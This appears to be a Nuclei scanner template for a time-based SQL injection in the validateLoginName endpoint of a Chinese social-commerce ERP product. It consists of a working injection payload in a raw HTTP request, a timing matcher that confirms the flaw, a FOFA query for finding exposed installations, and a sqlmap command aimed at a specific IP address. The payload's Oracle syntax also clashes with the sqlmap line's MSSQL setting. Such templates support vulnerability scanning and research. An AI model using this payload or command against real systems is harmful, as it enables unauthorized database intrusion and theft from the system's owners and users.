id: cloudsk-validateLoginName-sqli
info:
  name: 云时空社会化商业 ERP 系统 validateLoginName - SQL注入漏洞
  author: leadlife
  severity: high
  description: 
  reference: 
    - https://github.com/wy876/POC/blob/61b2bf45a165e027ea7014e0bd153f5bf1108b61/%E4%BA%91%E6%97%B6%E7%A9%BA/%E4%BA%91%E6%97%B6%E7%A9%BA%E7%A4%BE%E4%BC%9A%E5%8C%96%E5%95%86%E4%B8%9AERP%E7%B3%BB%E7%BB%9FvalidateLoginName%E6%8E%A5%E5%8F%A3%E5%A4%84%E5%AD%98%E5%9C%A8SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
  metadata:
    verified: true
    fofa-query: app="云时空社会化商业ERP系统"
    hunter-query: demo
    sqlmap: sqlmap -u "http://223.247.156.219:8091/sys/user/validateLoginName?loginName=admin" -p loginName --dbms=mssql
  tags: cloudsk,sqli,time

http:
  - raw:
      - |
        @timeout: 15s
        GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),6)-- HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh;q=0.9
        Connection: close
      
    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - duration >= 5 && duration < 9
        condition: and